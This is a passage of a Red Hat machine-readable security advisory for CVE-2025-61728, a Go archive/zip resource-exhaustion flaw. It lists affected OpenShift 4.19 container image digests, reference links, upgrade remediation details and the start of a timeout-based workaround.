"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-16T10:18:08+00:00",
"details": "For OpenShift Container Platform 4.19 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html/release_notes/\n\nYou may download the oc tool and use it to inspect release image metadata for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.\n\nThe sha values for the release are as follows:\n\n (For x86_64 architecture)\n The image digest is sha256:b274766f7194a7dc825e335a54078790519c0dbe3431c029fd08dbba1c431855\n\n (For s390x architecture)\n The image digest is sha256:066bfcb590ef6f34106e63861d420a3fdcdebd734bb729668c8c6de59b84c632\n\n (For ppc64le architecture)\n The image digest is sha256:ff14e60b2b4760a6c2578e444b40f457fe2322f5211b1b838078b1fa6ea1b443\n\n (For aarch64 architecture)\n The image digest is sha256:52b1e8cf83dd1a854194212cc94bfe2719afb2e014f7b1a315250a9c7273a600\n\nAll OpenShift Container Platform 4.19 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html-single/updating_clusters/index#updating-cluster-cli.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:7249"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
